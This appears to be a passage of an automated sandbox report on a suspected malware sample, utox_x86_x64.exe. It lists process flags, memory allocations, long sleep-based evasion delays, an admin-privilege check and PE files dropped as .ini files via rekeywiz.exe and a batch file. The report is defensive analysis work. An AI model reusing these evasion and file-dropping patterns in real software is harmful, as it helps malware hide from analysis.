Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmprph.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmprph.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 1A900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 2770000 memory reserve \| memory write watch
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 1AB10000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5746	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4091	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7629	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1973	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Window / User API: threadDelayed 457	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Window / User API: threadDelayed 3481	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6046
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3635
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 4894
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 4948

Source: C:\Windows\System32\rekeywiz.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Gga6.ini			Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\M08e.ini			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\Public\ajbs50ul.bat	API coverage: 1.5 %
Source: C:\Windows\System32\rekeywiz.exe	API coverage: 1.6 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3340	Thread sleep count: 5746 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868	Thread sleep count: 4091 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep count: 7629 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep count: 1973 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 3020	Thread sleep time: -33600s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 3020	Thread sleep time: -696200s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340	Thread sleep count: 6046 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340	Thread sleep count: 3635 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1036	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 916	Thread sleep count: 4894 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 1548	Thread sleep count: 4948 > 30
